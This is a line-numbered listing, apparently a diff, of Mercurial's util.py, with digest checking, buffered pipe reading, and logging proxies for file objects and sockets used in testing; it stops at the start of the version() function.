1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 from .thirdparty import (
40 attr,
41 )
39 42 from . import (
40 43 encoding,
41 44 error,
42 45 i18n,
43 46 node as nodemod,
44 47 policy,
45 48 pycompat,
46 49 urllibcompat,
47 50 )
48 51 from .utils import (
49 52 procutil,
50 53 stringutil,
51 54 )
52 55
53 56 base85 = policy.importmod(r'base85')
54 57 osutil = policy.importmod(r'osutil')
55 58 parsers = policy.importmod(r'parsers')
56 59
57 60 b85decode = base85.b85decode
58 61 b85encode = base85.b85encode
59 62
60 63 cookielib = pycompat.cookielib
61 64 httplib = pycompat.httplib
62 65 pickle = pycompat.pickle
63 66 safehasattr = pycompat.safehasattr
64 67 socketserver = pycompat.socketserver
65 68 bytesio = pycompat.bytesio
66 69 # TODO deprecate stringio name, as it is a lie on Python 3.
67 70 stringio = bytesio
68 71 xmlrpclib = pycompat.xmlrpclib
69 72
70 73 httpserver = urllibcompat.httpserver
71 74 urlerr = urllibcompat.urlerr
72 75 urlreq = urllibcompat.urlreq
73 76
74 77 # workaround for win32mbcs
75 78 _filenamebytestr = pycompat.bytestr
76 79
77 80 if pycompat.iswindows:
78 81 from . import windows as platform
79 82 else:
80 83 from . import posix as platform
81 84
82 85 _ = i18n._
83 86
84 87 bindunixsocket = platform.bindunixsocket
85 88 cachestat = platform.cachestat
86 89 checkexec = platform.checkexec
87 90 checklink = platform.checklink
88 91 copymode = platform.copymode
89 92 expandglobs = platform.expandglobs
90 93 getfsmountpoint = platform.getfsmountpoint
91 94 getfstype = platform.getfstype
92 95 groupmembers = platform.groupmembers
93 96 groupname = platform.groupname
94 97 isexec = platform.isexec
95 98 isowner = platform.isowner
96 99 listdir = osutil.listdir
97 100 localpath = platform.localpath
98 101 lookupreg = platform.lookupreg
99 102 makedir = platform.makedir
100 103 nlinks = platform.nlinks
101 104 normpath = platform.normpath
102 105 normcase = platform.normcase
103 106 normcasespec = platform.normcasespec
104 107 normcasefallback = platform.normcasefallback
105 108 openhardlinks = platform.openhardlinks
106 109 oslink = platform.oslink
107 110 parsepatchoutput = platform.parsepatchoutput
108 111 pconvert = platform.pconvert
109 112 poll = platform.poll
110 113 posixfile = platform.posixfile
111 114 rename = platform.rename
112 115 removedirs = platform.removedirs
113 116 samedevice = platform.samedevice
114 117 samefile = platform.samefile
115 118 samestat = platform.samestat
116 119 setflags = platform.setflags
117 120 split = platform.split
118 121 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 122 statisexec = platform.statisexec
120 123 statislink = platform.statislink
121 124 umask = platform.umask
122 125 unlink = platform.unlink
123 126 username = platform.username
124 127
125 128 try:
126 129 recvfds = osutil.recvfds
127 130 except AttributeError:
128 131 pass
129 132
130 133 # Python compatibility
131 134
132 135 _notset = object()
133 136
134 137 def bitsfrom(container):
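"""Return the bitwise OR of all values in `container`."""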
135 138 bits = 0
136 139 for bit in container:
137 140 bits |= bit
138 141 return bits
139 142
140 143 # python 2.6 still has deprecation warnings enabled by default. We do not want
141 144 # to display anything to standard users, so detect if we are running tests and
142 145 # only use python deprecation warnings in this case.
143 146 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
144 147 if _dowarn:
145 148 # explicitly unfilter our warning for python 2.7
146 149 #
147 150 # The option of setting PYTHONWARNINGS in the test runner was investigated.
148 151 # However, module name set through PYTHONWARNINGS was exactly matched, so
149 152 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
150 153 # makes the whole PYTHONWARNINGS thing useless for our usecase.
151 154 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
152 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
153 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
154 157 if _dowarn and pycompat.ispy3:
155 158 # silence warning emitted by passing user string to re.sub()
156 159 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
157 160 r'mercurial')
158 161 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
159 162 DeprecationWarning, r'mercurial')
160 163 # TODO: reinvent imp.is_frozen()
161 164 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
162 165 DeprecationWarning, r'mercurial')
163 166
164 167 def nouideprecwarn(msg, version, stacklevel=1):
165 168 """Issue an python native deprecation warning
166 169
167 170 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
168 171 """
169 172 if _dowarn:
170 173 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
171 174 " update your code.)") % version
172 175 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
173 176
174 177 DIGESTS = {
175 178 'md5': hashlib.md5,
176 179 'sha1': hashlib.sha1,
177 180 'sha512': hashlib.sha512,
178 181 }
179 182 # List of digest types from strongest to weakest
180 183 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
181 184
182 185 for k in DIGESTS_BY_STRENGTH:
183 186 assert k in DIGESTS
184 187
185 188 class digester(object):
186 189 """helper to compute digests.
187 190
188 191 This helper can be used to compute one or more digests given their name.
189 192
190 193 >>> d = digester([b'md5', b'sha1'])
191 194 >>> d.update(b'foo')
192 195 >>> [k for k in sorted(d)]
193 196 ['md5', 'sha1']
194 197 >>> d[b'md5']
195 198 'acbd18db4cc2f85cedef654fccc4a4d8'
196 199 >>> d[b'sha1']
197 200 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
198 201 >>> digester.preferred([b'md5', b'sha1'])
199 202 'sha1'
200 203 """
201 204
202 205 def __init__(self, digests, s=''):
203 206 self._hashes = {}
204 207 for k in digests:
205 208 if k not in DIGESTS:
206 209 raise error.Abort(_('unknown digest type: %s') % k)
207 210 self._hashes[k] = DIGESTS[k]()
208 211 if s:
209 212 self.update(s)
210 213
211 214 def update(self, data):
212 215 for h in self._hashes.values():
213 216 h.update(data)
214 217
215 218 def __getitem__(self, key):
216 219 if key not in DIGESTS:
217 220 raise error.Abort(_('unknown digest type: %s') % key)
218 221 return nodemod.hex(self._hashes[key].digest())
219 222
220 223 def __iter__(self):
221 224 return iter(self._hashes)
222 225
223 226 @staticmethod
224 227 def preferred(supported):
225 228 """returns the strongest digest type in both supported and DIGESTS."""
226 229
227 230 for k in DIGESTS_BY_STRENGTH:
228 231 if k in supported:
229 232 return k
230 233 return None
231 234
232 235 class digestchecker(object):
233 236 """file handle wrapper that additionally checks content against a given
234 237 size and digests.
235 238
236 239 d = digestchecker(fh, size, {'md5': '...'})
237 240
238 241 When multiple digests are given, all of them are validated.
239 242 """
240 243
241 244 def __init__(self, fh, size, digests):
242 245 self._fh = fh
243 246 self._size = size
244 247 self._got = 0
245 248 self._digests = dict(digests)
246 249 self._digester = digester(self._digests.keys())
247 250
248 251 def read(self, length=-1):
249 252 content = self._fh.read(length)
250 253 self._digester.update(content)
251 254 self._got += len(content)
252 255 return content
253 256
254 257 def validate(self):
255 258 if self._size != self._got:
256 259 raise error.Abort(_('size mismatch: expected %d, got %d') %
257 260 (self._size, self._got))
258 261 for k, v in self._digests.items():
259 262 if v != self._digester[k]:
260 263 # i18n: first parameter is a digest name
261 264 raise error.Abort(_('%s mismatch: expected %s, got %s') %
262 265 (k, v, self._digester[k]))
263 266
264 267 try:
265 268 buffer = buffer
266 269 except NameError:
267 270 def buffer(sliceable, offset=0, length=None):
268 271 if length is not None:
269 272 return memoryview(sliceable)[offset:offset + length]
270 273 return memoryview(sliceable)[offset:]
271 274
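# Illustrative note: on Python 3 the shim above emulates the Python 2
# builtin, e.g. buffer(b'abcdef', 2, 3) is a memoryview over b'cde'.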
272 275 _chunksize = 4096
273 276
274 277 class bufferedinputpipe(object):
275 278 """a manually buffered input pipe
276 279
277 280 Python will not let us use buffered IO and lazy reading with 'polling' at
278 281 the same time. We cannot probe the buffer state and select will not detect
279 282 that data are ready to read if they are already buffered.
280 283
281 284 This class lets us work around that by implementing its own buffering
282 285 (allowing efficient readline) while offering a way to know if the buffer is
283 286 empty from the output (allowing collaboration of the buffer with polling).
284 287
285 288 This class lives in the 'util' module because it makes use of the 'os'
286 289 module from the python stdlib.
287 290 """
288 291 def __new__(cls, fh):
289 292 # If we receive a fileobjectproxy, we need to use a variation of this
290 293 # class that notifies observers about activity.
291 294 if isinstance(fh, fileobjectproxy):
292 295 cls = observedbufferedinputpipe
293 296
294 297 return super(bufferedinputpipe, cls).__new__(cls)
295 298
296 299 def __init__(self, input):
297 300 self._input = input
298 301 self._buffer = []
299 302 self._eof = False
300 303 self._lenbuf = 0
301 304
302 305 @property
303 306 def hasbuffer(self):
304 307 """True is any data is currently buffered
305 308
306 309 This will be used externally a pre-step for polling IO. If there is
307 310 already data then no polling should be set in place."""
308 311 return bool(self._buffer)
309 312
310 313 @property
311 314 def closed(self):
312 315 return self._input.closed
313 316
314 317 def fileno(self):
315 318 return self._input.fileno()
316 319
317 320 def close(self):
318 321 return self._input.close()
319 322
320 323 def read(self, size):
321 324 while (not self._eof) and (self._lenbuf < size):
322 325 self._fillbuffer()
323 326 return self._frombuffer(size)
324 327
325 328 def unbufferedread(self, size):
326 329 if not self._eof and self._lenbuf == 0:
327 330 self._fillbuffer(max(size, _chunksize))
328 331 return self._frombuffer(min(self._lenbuf, size))
329 332
330 333 def readline(self, *args, **kwargs):
331 334 if 1 < len(self._buffer):
332 335 # this should not happen because both read and readline end with a
333 336 # _frombuffer call that collapses it.
334 337 self._buffer = [''.join(self._buffer)]
335 338 self._lenbuf = len(self._buffer[0])
336 339 lfi = -1
337 340 if self._buffer:
338 341 lfi = self._buffer[-1].find('\n')
339 342 while (not self._eof) and lfi < 0:
340 343 self._fillbuffer()
341 344 if self._buffer:
342 345 lfi = self._buffer[-1].find('\n')
343 346 size = lfi + 1
344 347 if lfi < 0: # end of file
345 348 size = self._lenbuf
346 349 elif 1 < len(self._buffer):
347 350 # we need to take previous chunks into account
348 351 size += self._lenbuf - len(self._buffer[-1])
349 352 return self._frombuffer(size)
350 353
351 354 def _frombuffer(self, size):
352 355 """return at most 'size' data from the buffer
353 356
354 357 The data are removed from the buffer."""
355 358 if size == 0 or not self._buffer:
356 359 return ''
357 360 buf = self._buffer[0]
358 361 if 1 < len(self._buffer):
359 362 buf = ''.join(self._buffer)
360 363
361 364 data = buf[:size]
362 365 buf = buf[len(data):]
363 366 if buf:
364 367 self._buffer = [buf]
365 368 self._lenbuf = len(buf)
366 369 else:
367 370 self._buffer = []
368 371 self._lenbuf = 0
369 372 return data
370 373
371 374 def _fillbuffer(self, size=_chunksize):
372 375 """read data to the buffer"""
373 376 data = os.read(self._input.fileno(), size)
374 377 if not data:
375 378 self._eof = True
376 379 else:
377 380 self._lenbuf += len(data)
378 381 self._buffer.append(data)
379 382
380 383 return data
381 384
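# Illustrative sketch (names below are only examples): wrap one end of an
# os.pipe() so buffered readline() can coexist with polling on fileno().
#
#     rfd, wfd = os.pipe()
#     os.write(wfd, b'one\ntwo\n')
#     os.close(wfd)
#     pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
#     pipe.readline()   # -> b'one\n'
#     pipe.hasbuffer    # True; b'two\n' is still buffered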
382 385 def mmapread(fp):
383 386 try:
384 387 fd = getattr(fp, 'fileno', lambda: fp)()
385 388 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
386 389 except ValueError:
387 390 # Empty files cannot be mmapped, but mmapread should still work. Check
388 391 # if the file is empty, and if so, return an empty buffer.
389 392 if os.fstat(fd).st_size == 0:
390 393 return ''
391 394 raise
392 395
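# Illustrative sketch (somepath is a placeholder): mmapread gives
# zero-copy access to a file's contents, falling back to an empty
# buffer for empty files.
#
#     with open(somepath, 'rb') as fp:
#         data = mmapread(fp)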
393 396 class fileobjectproxy(object):
394 397 """A proxy around file objects that tells a watcher when events occur.
395 398
396 399 This type is intended to only be used for testing purposes. Think hard
397 400 before using it in important code.
398 401 """
399 402 __slots__ = (
400 403 r'_orig',
401 404 r'_observer',
402 405 )
403 406
404 407 def __init__(self, fh, observer):
405 408 object.__setattr__(self, r'_orig', fh)
406 409 object.__setattr__(self, r'_observer', observer)
407 410
408 411 def __getattribute__(self, name):
409 412 ours = {
410 413 r'_observer',
411 414
412 415 # IOBase
413 416 r'close',
414 417 # closed if a property
415 418 r'fileno',
416 419 r'flush',
417 420 r'isatty',
418 421 r'readable',
419 422 r'readline',
420 423 r'readlines',
421 424 r'seek',
422 425 r'seekable',
423 426 r'tell',
424 427 r'truncate',
425 428 r'writable',
426 429 r'writelines',
427 430 # RawIOBase
428 431 r'read',
429 432 r'readall',
430 433 r'readinto',
431 434 r'write',
432 435 # BufferedIOBase
433 436 # raw is a property
434 437 r'detach',
435 438 # read defined above
436 439 r'read1',
437 440 # readinto defined above
438 441 # write defined above
439 442 }
440 443
441 444 # We only observe some methods.
442 445 if name in ours:
443 446 return object.__getattribute__(self, name)
444 447
445 448 return getattr(object.__getattribute__(self, r'_orig'), name)
446 449
447 450 def __nonzero__(self):
448 451 return bool(object.__getattribute__(self, r'_orig'))
449 452
450 453 __bool__ = __nonzero__
451 454
452 455 def __delattr__(self, name):
453 456 return delattr(object.__getattribute__(self, r'_orig'), name)
454 457
455 458 def __setattr__(self, name, value):
456 459 return setattr(object.__getattribute__(self, r'_orig'), name, value)
457 460
458 461 def __iter__(self):
459 462 return object.__getattribute__(self, r'_orig').__iter__()
460 463
461 464 def _observedcall(self, name, *args, **kwargs):
462 465 # Call the original object.
463 466 orig = object.__getattribute__(self, r'_orig')
464 467 res = getattr(orig, name)(*args, **kwargs)
465 468
466 469 # Call a method on the observer of the same name with arguments
467 470 # so it can react, log, etc.
468 471 observer = object.__getattribute__(self, r'_observer')
469 472 fn = getattr(observer, name, None)
470 473 if fn:
471 474 fn(res, *args, **kwargs)
472 475
473 476 return res
474 477
475 478 def close(self, *args, **kwargs):
476 479 return object.__getattribute__(self, r'_observedcall')(
477 480 r'close', *args, **kwargs)
478 481
479 482 def fileno(self, *args, **kwargs):
480 483 return object.__getattribute__(self, r'_observedcall')(
481 484 r'fileno', *args, **kwargs)
482 485
483 486 def flush(self, *args, **kwargs):
484 487 return object.__getattribute__(self, r'_observedcall')(
485 488 r'flush', *args, **kwargs)
486 489
487 490 def isatty(self, *args, **kwargs):
488 491 return object.__getattribute__(self, r'_observedcall')(
489 492 r'isatty', *args, **kwargs)
490 493
491 494 def readable(self, *args, **kwargs):
492 495 return object.__getattribute__(self, r'_observedcall')(
493 496 r'readable', *args, **kwargs)
494 497
495 498 def readline(self, *args, **kwargs):
496 499 return object.__getattribute__(self, r'_observedcall')(
497 500 r'readline', *args, **kwargs)
498 501
499 502 def readlines(self, *args, **kwargs):
500 503 return object.__getattribute__(self, r'_observedcall')(
501 504 r'readlines', *args, **kwargs)
502 505
503 506 def seek(self, *args, **kwargs):
504 507 return object.__getattribute__(self, r'_observedcall')(
505 508 r'seek', *args, **kwargs)
506 509
507 510 def seekable(self, *args, **kwargs):
508 511 return object.__getattribute__(self, r'_observedcall')(
509 512 r'seekable', *args, **kwargs)
510 513
511 514 def tell(self, *args, **kwargs):
512 515 return object.__getattribute__(self, r'_observedcall')(
513 516 r'tell', *args, **kwargs)
514 517
515 518 def truncate(self, *args, **kwargs):
516 519 return object.__getattribute__(self, r'_observedcall')(
517 520 r'truncate', *args, **kwargs)
518 521
519 522 def writable(self, *args, **kwargs):
520 523 return object.__getattribute__(self, r'_observedcall')(
521 524 r'writable', *args, **kwargs)
522 525
523 526 def writelines(self, *args, **kwargs):
524 527 return object.__getattribute__(self, r'_observedcall')(
525 528 r'writelines', *args, **kwargs)
526 529
527 530 def read(self, *args, **kwargs):
528 531 return object.__getattribute__(self, r'_observedcall')(
529 532 r'read', *args, **kwargs)
530 533
531 534 def readall(self, *args, **kwargs):
532 535 return object.__getattribute__(self, r'_observedcall')(
533 536 r'readall', *args, **kwargs)
534 537
535 538 def readinto(self, *args, **kwargs):
536 539 return object.__getattribute__(self, r'_observedcall')(
537 540 r'readinto', *args, **kwargs)
538 541
539 542 def write(self, *args, **kwargs):
540 543 return object.__getattribute__(self, r'_observedcall')(
541 544 r'write', *args, **kwargs)
542 545
543 546 def detach(self, *args, **kwargs):
544 547 return object.__getattribute__(self, r'_observedcall')(
545 548 r'detach', *args, **kwargs)
546 549
547 550 def read1(self, *args, **kwargs):
548 551 return object.__getattribute__(self, r'_observedcall')(
549 552 r'read1', *args, **kwargs)
550 553
551 554 class observedbufferedinputpipe(bufferedinputpipe):
552 555 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
553 556
554 557 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
555 558 bypass ``fileobjectproxy``. Because of this, we need to make
556 559 ``bufferedinputpipe`` aware of these operations.
557 560
558 561 This variation of ``bufferedinputpipe`` can notify observers about
559 562 ``os.read()`` events. It also re-publishes other events, such as
560 563 ``read()`` and ``readline()``.
561 564 """
562 565 def _fillbuffer(self):
563 566 res = super(observedbufferedinputpipe, self)._fillbuffer()
564 567
565 568 fn = getattr(self._input._observer, r'osread', None)
566 569 if fn:
567 570 fn(res, _chunksize)
568 571
569 572 return res
570 573
571 574 # We use different observer methods because the operation isn't
572 575 # performed on the actual file object but on us.
573 576 def read(self, size):
574 577 res = super(observedbufferedinputpipe, self).read(size)
575 578
576 579 fn = getattr(self._input._observer, r'bufferedread', None)
577 580 if fn:
578 581 fn(res, size)
579 582
580 583 return res
581 584
582 585 def readline(self, *args, **kwargs):
583 586 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
584 587
585 588 fn = getattr(self._input._observer, r'bufferedreadline', None)
586 589 if fn:
587 590 fn(res)
588 591
589 592 return res
590 593
591 594 PROXIED_SOCKET_METHODS = {
592 595 r'makefile',
593 596 r'recv',
594 597 r'recvfrom',
595 598 r'recvfrom_into',
596 599 r'recv_into',
597 600 r'send',
598 601 r'sendall',
599 602 r'sendto',
600 603 r'setblocking',
601 604 r'settimeout',
602 605 r'gettimeout',
603 606 r'setsockopt',
604 607 }
605 608
606 609 class socketproxy(object):
607 610 """A proxy around a socket that tells a watcher when events occur.
608 611
609 612 This is like ``fileobjectproxy`` except for sockets.
610 613
611 614 This type is intended to only be used for testing purposes. Think hard
612 615 before using it in important code.
613 616 """
614 617 __slots__ = (
615 618 r'_orig',
616 619 r'_observer',
617 620 )
618 621
619 622 def __init__(self, sock, observer):
620 623 object.__setattr__(self, r'_orig', sock)
621 624 object.__setattr__(self, r'_observer', observer)
622 625
623 626 def __getattribute__(self, name):
624 627 if name in PROXIED_SOCKET_METHODS:
625 628 return object.__getattribute__(self, name)
626 629
627 630 return getattr(object.__getattribute__(self, r'_orig'), name)
628 631
629 632 def __delattr__(self, name):
630 633 return delattr(object.__getattribute__(self, r'_orig'), name)
631 634
632 635 def __setattr__(self, name, value):
633 636 return setattr(object.__getattribute__(self, r'_orig'), name, value)
634 637
635 638 def __nonzero__(self):
636 639 return bool(object.__getattribute__(self, r'_orig'))
637 640
638 641 __bool__ = __nonzero__
639 642
640 643 def _observedcall(self, name, *args, **kwargs):
641 644 # Call the original object.
642 645 orig = object.__getattribute__(self, r'_orig')
643 646 res = getattr(orig, name)(*args, **kwargs)
644 647
645 648 # Call a method on the observer of the same name with arguments
646 649 # so it can react, log, etc.
647 650 observer = object.__getattribute__(self, r'_observer')
648 651 fn = getattr(observer, name, None)
649 652 if fn:
650 653 fn(res, *args, **kwargs)
651 654
652 655 return res
653 656
654 657 def makefile(self, *args, **kwargs):
655 658 res = object.__getattribute__(self, r'_observedcall')(
656 659 r'makefile', *args, **kwargs)
657 660
658 661 # The file object may be used for I/O. So we turn it into a
659 662 # proxy using our observer.
660 663 observer = object.__getattribute__(self, r'_observer')
661 664 return makeloggingfileobject(observer.fh, res, observer.name,
662 665 reads=observer.reads,
663 666 writes=observer.writes,
664 667 logdata=observer.logdata,
665 668 logdataapis=observer.logdataapis)
666 669
667 670 def recv(self, *args, **kwargs):
668 671 return object.__getattribute__(self, r'_observedcall')(
669 672 r'recv', *args, **kwargs)
670 673
671 674 def recvfrom(self, *args, **kwargs):
672 675 return object.__getattribute__(self, r'_observedcall')(
673 676 r'recvfrom', *args, **kwargs)
674 677
675 678 def recvfrom_into(self, *args, **kwargs):
676 679 return object.__getattribute__(self, r'_observedcall')(
677 680 r'recvfrom_into', *args, **kwargs)
678 681
679 682 def recv_into(self, *args, **kwargs):
680 683 return object.__getattribute__(self, r'_observedcall')(
681 684 r'recv_into', *args, **kwargs)
682 685
683 686 def send(self, *args, **kwargs):
684 687 return object.__getattribute__(self, r'_observedcall')(
685 688 r'send', *args, **kwargs)
686 689
687 690 def sendall(self, *args, **kwargs):
688 691 return object.__getattribute__(self, r'_observedcall')(
689 692 r'sendall', *args, **kwargs)
690 693
691 694 def sendto(self, *args, **kwargs):
692 695 return object.__getattribute__(self, r'_observedcall')(
693 696 r'sendto', *args, **kwargs)
694 697
695 698 def setblocking(self, *args, **kwargs):
696 699 return object.__getattribute__(self, r'_observedcall')(
697 700 r'setblocking', *args, **kwargs)
698 701
699 702 def settimeout(self, *args, **kwargs):
700 703 return object.__getattribute__(self, r'_observedcall')(
701 704 r'settimeout', *args, **kwargs)
702 705
703 706 def gettimeout(self, *args, **kwargs):
704 707 return object.__getattribute__(self, r'_observedcall')(
705 708 r'gettimeout', *args, **kwargs)
706 709
707 710 def setsockopt(self, *args, **kwargs):
708 711 return object.__getattribute__(self, r'_observedcall')(
709 712 r'setsockopt', *args, **kwargs)
710 713
711 714 class baseproxyobserver(object):
712 715 def _writedata(self, data):
713 716 if not self.logdata:
714 717 if self.logdataapis:
715 718 self.fh.write('\n')
716 719 self.fh.flush()
717 720 return
718 721
719 722 # Simple case writes all data on a single line.
720 723 if b'\n' not in data:
721 724 if self.logdataapis:
722 725 self.fh.write(': %s\n' % stringutil.escapestr(data))
723 726 else:
724 727 self.fh.write('%s> %s\n'
725 728 % (self.name, stringutil.escapestr(data)))
726 729 self.fh.flush()
727 730 return
728 731
729 732 # Data with newlines is written to multiple lines.
730 733 if self.logdataapis:
731 734 self.fh.write(':\n')
732 735
733 736 lines = data.splitlines(True)
734 737 for line in lines:
735 738 self.fh.write('%s> %s\n'
736 739 % (self.name, stringutil.escapestr(line)))
737 740 self.fh.flush()
738 741
739 742 class fileobjectobserver(baseproxyobserver):
740 743 """Logs file object activity."""
741 744 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
742 745 logdataapis=True):
743 746 self.fh = fh
744 747 self.name = name
745 748 self.logdata = logdata
746 749 self.logdataapis = logdataapis
747 750 self.reads = reads
748 751 self.writes = writes
749 752
750 753 def read(self, res, size=-1):
751 754 if not self.reads:
752 755 return
753 756 # Python 3 can return None from reads at EOF instead of empty strings.
754 757 if res is None:
755 758 res = ''
756 759
757 760 if size == -1 and res == '':
758 761 # Suppress pointless read(-1) calls that return
759 762 # nothing. These happen _a lot_ on Python 3, and there
760 763 # doesn't seem to be a better workaround to have matching
761 764 # Python 2 and 3 behavior. :(
762 765 return
763 766
764 767 if self.logdataapis:
765 768 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
766 769
767 770 self._writedata(res)
768 771
769 772 def readline(self, res, limit=-1):
770 773 if not self.reads:
771 774 return
772 775
773 776 if self.logdataapis:
774 777 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
775 778
776 779 self._writedata(res)
777 780
778 781 def readinto(self, res, dest):
779 782 if not self.reads:
780 783 return
781 784
782 785 if self.logdataapis:
783 786 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
784 787 res))
785 788
786 789 data = dest[0:res] if res is not None else b''
787 790 self._writedata(data)
788 791
789 792 def write(self, res, data):
790 793 if not self.writes:
791 794 return
792 795
793 796 # Python 2 returns None from some write() calls. Python 3 (reasonably)
794 797 # returns the number of bytes written.
795 798 if res is None and data:
796 799 res = len(data)
797 800
798 801 if self.logdataapis:
799 802 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
800 803
801 804 self._writedata(data)
802 805
803 806 def flush(self, res):
804 807 if not self.writes:
805 808 return
806 809
807 810 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
808 811
809 812 # For observedbufferedinputpipe.
810 813 def bufferedread(self, res, size):
811 814 if not self.reads:
812 815 return
813 816
814 817 if self.logdataapis:
815 818 self.fh.write('%s> bufferedread(%d) -> %d' % (
816 819 self.name, size, len(res)))
817 820
818 821 self._writedata(res)
819 822
820 823 def bufferedreadline(self, res):
821 824 if not self.reads:
822 825 return
823 826
824 827 if self.logdataapis:
825 828 self.fh.write('%s> bufferedreadline() -> %d' % (
826 829 self.name, len(res)))
827 830
828 831 self._writedata(res)
829 832
830 833 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
831 834 logdata=False, logdataapis=True):
832 835 """Turn a file object into a logging file object."""
833 836
834 837 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
835 838 logdata=logdata, logdataapis=logdataapis)
836 839 return fileobjectproxy(fh, observer)
837 840
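# A hedged usage sketch for makeloggingfileobject: wrap an in-memory file
# so every read is mirrored to a log handle. This assumes the bytes-native
# str semantics of Python 2 that the observers above rely on ('%s'
# formatting written to a bytes log handle).
def _demologgingfileobject():
    import io
    log = io.BytesIO()
    fh = makeloggingfileobject(log, io.BytesIO('payload'), 'demo',
                               logdata=True)
    fh.read(3)  # log now holds a line like "demo> read(3) -> 3: pay"
    return log.getvalue()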
838 841 class socketobserver(baseproxyobserver):
839 842 """Logs socket activity."""
840 843 def __init__(self, fh, name, reads=True, writes=True, states=True,
841 844 logdata=False, logdataapis=True):
842 845 self.fh = fh
843 846 self.name = name
844 847 self.reads = reads
845 848 self.writes = writes
846 849 self.states = states
847 850 self.logdata = logdata
848 851 self.logdataapis = logdataapis
849 852
850 853 def makefile(self, res, mode=None, bufsize=None):
851 854 if not self.states:
852 855 return
853 856
854 857 self.fh.write('%s> makefile(%r, %r)\n' % (
855 858 self.name, mode, bufsize))
856 859
857 860 def recv(self, res, size, flags=0):
858 861 if not self.reads:
859 862 return
860 863
861 864 if self.logdataapis:
862 865 self.fh.write('%s> recv(%d, %d) -> %d' % (
863 866 self.name, size, flags, len(res)))
864 867 self._writedata(res)
865 868
866 869 def recvfrom(self, res, size, flags=0):
867 870 if not self.reads:
868 871 return
869 872
870 873 if self.logdataapis:
871 874 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
872 875 self.name, size, flags, len(res[0])))
873 876
874 877 self._writedata(res[0])
875 878
876 879 def recvfrom_into(self, res, buf, size, flags=0):
877 880 if not self.reads:
878 881 return
879 882
880 883 if self.logdataapis:
881 884 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
882 885 self.name, size, flags, res[0]))
883 886
884 887 self._writedata(buf[0:res[0]])
885 888
886 889 def recv_into(self, res, buf, size=0, flags=0):
887 890 if not self.reads:
888 891 return
889 892
890 893 if self.logdataapis:
891 894 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
892 895 self.name, size, flags, res))
893 896
894 897 self._writedata(buf[0:res])
895 898
896 899 def send(self, res, data, flags=0):
897 900 if not self.writes:
898 901 return
899 902
900 903 self.fh.write('%s> send(%d, %d) -> %d' % (
901 904 self.name, len(data), flags, res))
902 905 self._writedata(data)
903 906
904 907 def sendall(self, res, data, flags=0):
905 908 if not self.writes:
906 909 return
907 910
908 911 if self.logdataapis:
909 912 # Returns None on success. So don't bother reporting return value.
910 913 self.fh.write('%s> sendall(%d, %d)' % (
911 914 self.name, len(data), flags))
912 915
913 916 self._writedata(data)
914 917
915 918 def sendto(self, res, data, flagsoraddress, address=None):
916 919 if not self.writes:
917 920 return
918 921
919 922 if address:
920 923 flags = flagsoraddress
921 924 else:
922 925 flags = 0
923 926
924 927 if self.logdataapis:
925 928 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
926 929 self.name, len(data), flags, address, res))
927 930
928 931 self._writedata(data)
929 932
930 933 def setblocking(self, res, flag):
931 934 if not self.states:
932 935 return
933 936
934 937 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
935 938
936 939 def settimeout(self, res, value):
937 940 if not self.states:
938 941 return
939 942
940 943 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
941 944
942 945 def gettimeout(self, res):
943 946 if not self.states:
944 947 return
945 948
946 949 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
947 950
948 951 def setsockopt(self, res, level, optname, value):
949 952 if not self.states:
950 953 return
951 954
952 955 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
953 956 self.name, level, optname, value, res))
954 957
955 958 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
956 959 logdata=False, logdataapis=True):
957 960 """Turn a socket into a logging socket."""
958 961
959 962 observer = socketobserver(logh, name, reads=reads, writes=writes,
960 963 states=states, logdata=logdata,
961 964 logdataapis=logdataapis)
962 965 return socketproxy(fh, observer)
963 966
964 967 def version():
